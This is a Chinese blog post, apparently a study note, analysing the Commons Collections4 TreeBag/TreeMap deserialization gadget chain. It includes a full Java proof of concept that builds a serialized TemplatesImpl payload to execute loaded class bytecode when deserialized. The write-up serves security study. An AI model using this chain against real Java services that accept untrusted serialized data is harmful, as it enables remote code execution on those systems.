java--CommonsCollections4学习

已于 2022-05-29 09:14:56 修改
阅读量269 收藏
点赞数 1
分类专栏: 代码审计学习 文章标签: 学习
于 2022-05-27 21:08:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44769520/article/details/125010864
版权

和cc2差异不大,那么这次学习一下其它的利用。

 

TreeBag & TreeMap

在 CC2 中,使用了优先级队列 PriorityQueue 反序列化时会调用 comparator 的 compare 方法的特性,配合 TransformingComparator 触发 transformer。

除了 PriorityQueue,还能否找到其他的提供排序的类,在反序列化时会调用到比较器呢?于是找到了 TreeBag。

探究一下过程

首先看一下TreeBag的readObject方法,发现它其中使用了doReadObject并且传入了一个TreeMap对象

那么我们继续跟进doReadOject,发现这里会使用map的put方法,因为传入的是TreeMap,于是进入TreeMap的put方法

进入TreeMap,发现它的put方法会调用compare方法,继续跟进

其中compare方法

到这我们就可以想到使用TransformingComparator了

先回顾一下PriorityQueue的利用,我们通过修改它的comparator为TransformingComparator

但是我们可以看到TreeBag中没有定义好的comparator

但是在后续调用中的TreeMap会使用comparator,那么我们构造payload的思路就是:

在建立TreeBag的时候我们加入一个能执行恶意命令的comparator,里面放着TemplatesImpl字节码对象,但如果这时我们直接调用getOutputProperties或者newInstance的话,那么在构造payload的时候就会触发执行,那这样就不符合我们的预期了,那么我们可以在触发之前先不使用这两个函数,可以使用一个过程方法例如toString()【因为这个方法是public方法且是Object对象,那么任意方法都可以使用】,然后在最后将toString替换成触发函数,然后在反序列化的时候从而触发命令。

cc4.java

import org.apache.commons.collections4.bag.TreeBag;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.InvokerTransformer;
import java.io.*;
import java.lang.reflect.Field;


public class cc4 {
    public static void main(String[] args) throws Exception {
        FileInputStream inputFromFile = new FileInputStream("/Users/zyer/Downloads/untitled/out/production/untitled/Exp2.class");
        byte[] bs = new byte[inputFromFile.available()];
        inputFromFile.read(bs);
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj, "_bytecodes", new byte[][]{bs});
        setFieldValue(obj, "_name", "zyer");
        setFieldValue(obj, "_tfactory", new TransformerFactoryImpl());


        Transformer transformer = new InvokerTransformer("toString", new Class[]{}, new Object[]{});
        TransformingComparator comparator  = new TransformingComparator(transformer);
        TreeBag treeBag = new TreeBag(comparator);
        treeBag.add(obj);
        Field field = InvokerTransformer.class.getDeclaredField("iMethodName");
        field.setAccessible(true);
        field.set(transformer,"getOutputProperties");


        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("1.ser"));
        objectOutputStream.writeObject(treeBag);
        objectOutputStream.close();
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream("1.ser"));
        objectInputStream.readObject();



    }
    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception {
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj, value);
    }
}

现在利用的还是读取文件的方式,等后续会学习javassist直接写入恶意的class文件

最近搞毕业和一些工作的事情搞的没有时间学习,最近需要重新调整一下,要不然又变回小菜鸡了。。。

zyer1
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Java反序列化(六)Common Collection 4分析
Vicl1fe的博客
06-03 531
前言 环境 jdk1.7 Commons Collections 4.0 <dependency> <groupId>org.apache.commons</groupId> <artifactId>commons-collections4</artifactId> <version>4.0</version> </dependency> <dependency>
mysql-connector-java-5.1.40.jar
06-04
mysql-connector-java-5.1.40.jar连接mysql数据库的jar包,
Apache Commons-Collections4工具类使用(Map、List、Set集合全覆盖)集合开发工具大利器
竹林幽深
08-22 1647
开发中我们常常会遇到对集合的操作,使用这个类库能简化你的代码,从而提高你的工作效率,让你从大量的底层代码中抽身。工欲善其事必先利其器,希望我介绍以后大家在开发中多多去使用这些工具类,让它们成为你在开发中的大利器。extends O> b):两个集合的连接,类似于ORACLE数据库union all的功能。CollectionUtils:集合操作的工具类,开发中会常常的使用。xiaozhang ,公众号:程序员xiaozhang。如下是它的包结构,里面有很多好用的工具类。收录于合集#Java27个。
Java 反序列化漏洞-Apache Commons Collections4-TreeBag攻击链
cjdgg的博客
10-06 1366
知识点补充可以看看我前面写的CC2和CC3CC4这条链其实是CC2的变种,与CC2不同的是和CC3一样用了InstantiateTransformer而不是InvokerTransformer触发利用链,ysoserial中用 PriorityQueue 的 TransformingComparator 触发 ChainedTransformer,再利用 InstantiateTransformer 实例化 TemplatesImpl。
CommonsCollections4分析
笑花大王
12-27 346
第一章 什么是sql注入 基础知识 PriorityQueue PriorityQueue()使用默认的初始容量(11)创建一个 PriorityQueue,并根据其自然顺序对元素进行排序。 PriorityQueue(int initialCapacity)使用指定的初始容量创建一个 PriorityQueue,并根据其自然顺序对元素进行排序。 常用方法: add(E e) ...
Java:org.apache.commons.collections4.MapUtils获取Map数据
彭世瑜的博客
02-13 3128
依赖 <dependency> <groupId>org.apache.commons</groupId> <artifactId>commons-collections4</artifactId> <version>4.4</version> </dependency> 示例 package com.demo.map; import org.apache.commons.collectio
java学习平台-论文
最新发布
02-01
java学习平台--论文java学习平台--论文java学习平台--论文java学习平台--论文java学习平台--论文java学习平台--论文java学习平台--论文java学习平台--论文java学习平台--论文java学习平台--论文java学习平台--论文...
mysql-connector-java-8.0.29.jar
04-27
MySQL JDBC驱动包
mysql-connector-java-8.0.18.jar
10-24
这是MySQL最新的jar,mysql-connector-java-8.0.18.jar
mysql连接包mysql-connector-java-5.1.27.jar
05-31
`mysql-connector-java-5.1.27.jar`是这个驱动的一个特定版本,它允许Java开发者在他们的应用中无缝地访问和操作MySQL数据库。 MySQL连接器(JDBC驱动)是Java Database Connectivity (JDBC)的一部分,JDBC是Java ...
commons-collections4-4.2资源包
12-05
Apache Commons Collections 4.2、可重用的java工具包。
commons-collections4-4.3.jar
03-13
用于excel导入的commons-collections4-4.3.jar,采用java实现。
commons-collections4-4.4-API文档-中英对照版.zip
05-04
赠送jar包:commons-collections4-4.4.jar; 赠送原API文档:commons-collections4-4.4-javadoc.jar; 赠送源代码:commons-collections4-4.4-sources.jar; 赠送Maven依赖信息文件:commons-collections4-4.4.pom; 包含翻译后的API文档:commons-collections4-4.4-javadoc-API文档-中文(简体)-英语-对照版.zip; Maven坐标:org.apache.commons:commons-collections4:4.4; 标签:apache、collections4、commons、jar包、java、中英对照文档; 使用方法:解压翻译后的API文档,用浏览器打开“index.html”文件,即可纵览文档内容。 人性化翻译,文档中的代码和结构保持不变,注释和说明精准翻译,请放心使用。 双语对照,边学技术、边学英语。
commons-collections4-4.4-API文档-中文版.zip
05-09
赠送jar包:commons-collections4-4.4.jar; 赠送原API文档:commons-collections4-4.4-javadoc.jar; 赠送源代码:commons-collections4-4.4-sources.jar; 赠送Maven依赖信息文件:commons-collections4-4.4.pom; 包含翻译后的API文档:commons-collections4-4.4-javadoc-API文档-中文(简体)版.zip; Maven坐标:org.apache.commons:commons-collections4:4.4; 标签:apache、collections4、commons、jar包、java、中文文档; 使用方法:解压翻译后的API文档,用浏览器打开“index.html”文件,即可纵览文档内容。 人性化翻译,文档中的代码和结构保持不变,注释和说明精准翻译,请放心使用。
commons-collections4-4.1.jar
08-14
java读取excel2007解决org.apache.commons.collections找不到的问题。
Java集合-treebag
weixin_30814223的博客
01-22 268
import org.apache.commons.collections4.Bag; import org.apache.commons.collections4.bag.TreeBag; import java.util.Arrays; public class ApacheTreeBag { public static void main(String[] a...
将List集合按长度切分
stormkai的专栏
10-17 4256
在日常工作中,经常会遇到需要将list集合进行拆分然后进行操作,比如像在tidb中一个事务默认最多5000条sql statement,或者mysql批量处理时候max_allowed_packet默认大小的限制,一般都需要去把对应数据的集合去拆分然后进行操作。
咖啡汪日志——实际工作中好用的集合工具类(org.apache.commons.collections4.CollectionUtils)
weixin_42994251的博客
12-09 1858
判断list为空的情况:if(list == null || list.size() == 0){ } 判断list不为空的情况:if(list != null && list.size()>0){ }
lz4-java-1.8.0.jar
12-31
lz4-java-1.8.0.jar是一个用于Java平台的LZ4压缩算法的开源库。LZ4是一种高效的压缩算法,它可以在非常快的速度下进行数据压缩和解压缩。在数据传输和存储过程中,使用LZ4可以显著减少数据的大小,从而降低带宽消耗...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值